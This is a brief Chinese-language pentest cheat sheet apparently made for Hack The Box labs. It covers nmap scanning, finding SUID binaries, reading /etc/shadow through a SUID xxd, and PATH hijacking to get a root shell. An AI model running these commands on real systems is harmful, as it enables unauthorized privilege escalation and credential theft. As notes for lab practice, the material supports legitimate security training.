渗透(Hack The Box / HTB)
扫描
nmap
nmap -sC -sV xx.xx.xx.xx -oA src/-sCis for using default nmap scripts,-sVfor enumerating services versions,-oAis for output ALL format and specify the directorysrc,NOTICE: you may be adding
-Pnif you have an error wait for some time and here is the result.
提权
SUID提权(4000权限)
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。
发现系统上运行的所有SUID可执行文件,不同系统适用于不同的命令:
1
2
3find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;提权命令:
1
xxd "/etc/shadow" | xxd -r
环境变量提权
1
2
3
4
5
6
7
8
9#/home/raj/script/shell具SUID权限
cd /tmp
echo “/bin/bash” > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/raj/script
./shell
whoami
以其他用户运行命令
sudo -l(查看此用户拥有的特殊权限)echo password | su -c userB cat xxx.txt
